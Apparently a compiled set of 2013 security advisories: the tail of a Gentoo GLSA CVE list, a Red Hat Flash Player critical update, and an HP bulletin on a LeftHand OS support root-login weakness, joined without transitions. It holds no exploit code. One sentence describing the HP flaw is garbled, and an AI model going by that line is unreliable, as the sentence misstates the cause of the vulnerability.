84 ] CVE-2013-1372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1372 [ 85 ] CVE-2013-1373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1373 [ 86 ] CVE-2013-1374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1374 [ 87 ] CVE-2013-1375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1375 [ 88 ] CVE-2013-1378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1378 [ 89 ] CVE-2013-1379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1379 [ 90 ] CVE-2013-1380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1380 [ 91 ] CVE-2013-2555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2555 [ 92 ] CVE-2013-2728 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2728 [ 93 ] CVE-2013-3343 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3343 [ 94 ] CVE-2013-3344 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3344 [ 95 ] CVE-2013-3345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3345 [ 96 ] CVE-2013-3347 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3347 [ 97 ] CVE-2013-3361 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3361 [ 98 ] CVE-2013-3362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3362 [ 99 ] CVE-2013-3363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3363 [ 100 ] CVE-2013-5324 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5324 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201309-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2013:1035-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1035.html Issue date: 2013-07-10 CVE Names: CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes three security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security bulletin APSB13-17, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the malicious SWF content. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 982749 - CVE-2013-3344 CVE-2013-3345 CVE-2013-3347 flash-plugin: Multiple code execution flaws (APSB13-17) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.297-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.297-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.297-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.297-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-3344.html https://www.redhat.com/security/data/cve/CVE-2013-3345.html https://www.redhat.com/security/data/cve/CVE-2013-3347.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb13-17.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFR3RcFXlSAg2UNWIIRAibqAJ4ueutMxMCpS7cVyM01x68cJzonJwCgwGMI wOssXF1MQp0avKW9aWq5yP8= =2PBY -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

LeftHand OS (aka SAN iQ) 10.5 and earlier on HP StoreVirtual Storage devices does not provide a mechanism for disabling the HP Support challenge-response root-login feature, which makes it easier for remote attackers to obtain administrative access by leveraging knowledge of an unused one-time password. HP StoreVirtual products using LeftHand OS are prone to an unauthorized-access vulnerability. A remote attacker can exploit this issue to gain unauthorized access to the affected device. This may aid in further attacks. HP StoreVirtual Storage is a set of virtual storage devices supported by LeftHand OS of Hewlett-Packard (HP), which provides functions such as updating data centers, reducing SAN costs and eliminating failure points. LeftHand OS (aka SAN iQ) is an operating system used on this device. The vulnerability is caused by remote attacks. Password to gain the root authority of the user. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03825537 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03825537 Version: 2 HPSBST02896 rev.2 - HP StoreVirtual Storage, Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-17 Last Updated: 2013-07-17 Potential Security Impact: Remote unauthorized access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with the HP StoreVirtual Storage. All HP StoreVirtual Storage systems are equipped with a mechanism that allows HP support to access the underlying operating system if permission and access is provided by the customer. This functionality cannot be disabled today. HP StoreVirtual products are storage appliances that use a custom operating system, LeftHand OS, which is not accessible to the end user. Limited access is available to the user via the HP StoreVirtual Command-Line Interface (CLiQ) however root access is blocked. Root access may be requested by HP Support in some cases to help customers resolve complex support issues. To facilitate these cases, a challenge-response-based one-time password utility is employed by HP Support to gain root access to systems when the customer has granted permission and network access to the system. The one-time password utility protects the root access by preventing repeated access to the system with the same pass phrase. Root access to the LeftHand OS does not provide access to the user data being stored on the system. References: CVE-2013-2352 (SSRT101257) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. This issue effects LeftHand OS (a.k.a. SAN iQ) software versions 10.5 and earlier. HP StoreVirtual device HP P4300 HP P4500 HP P4300 G2 HP P4500 G2 HP P4800 G2 HP P4900 G2 HP P4000 VSA HP StoreVirtual 4130 HP StoreVirtual 4330 HP StoreVirtual 4530 HP StoreVirtual 4630 HP StoreVirtual 4730 HP StoreVirtual VSA LeftHand NSM2060 LeftHand NSM2120 Dell PowerEdge 2950 HP DL320S IBM System x3650 LeftHand NSM2060 G2 LeftHand NSM2120 G2 LeftHand VSA BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2013-2352 (AV:N/AC:L/Au:N/C:N/I:C/A:C) 9.4 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Joshua Small for reporting this issue to security-alert@hp.com RESOLUTION HP has provided patches to resolve this vulnerability. Please see the table below to determine which patch applies to the StoreVirtual version being used. Installation of patch 25051-00 will fail if 9.5 Patch Set 05 is not present Note: HP Support may still request root access to customer systems in order to resolve certain support issues. Patches and release notes may be downloaded using the 9.5 or later CMC. Go to http://www.hp.com/go/hpsc Select your specific product. If you have a HP P4x00 G2 or HP StoreVirtual 4000 product select 'HP StoreVirtual 4000 Storage'. Select 'Drivers, Software & Firmware' under 'Download Options' in the left menu. Select your specific product. Select your language. Click 'Cross operating system (BIOS, Firmware, Diagnostics, etc.)' Click 'Patch' or scroll down to the Patch table j. In the Description column of the Patch table, click the title of the patch: To download the file, click the 'Download' button. To read the release notes, click the 'Release Notes' tab. HISTORY Version:1 (rev.1) - 9 July 2013 Initial release Version:2 (rev.2) - 17 July 2013 Documented the released patches, added LeftHand NSM2120 Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlHnM80ACgkQ4B86/C0qfVlJvACfYidpkJWgTf29SPsi6ABOpm0y oo0AoNyRilCrIZTF6+a3pOqr4epkrCRX =PHV+ -----END PGP SIGNATURE-----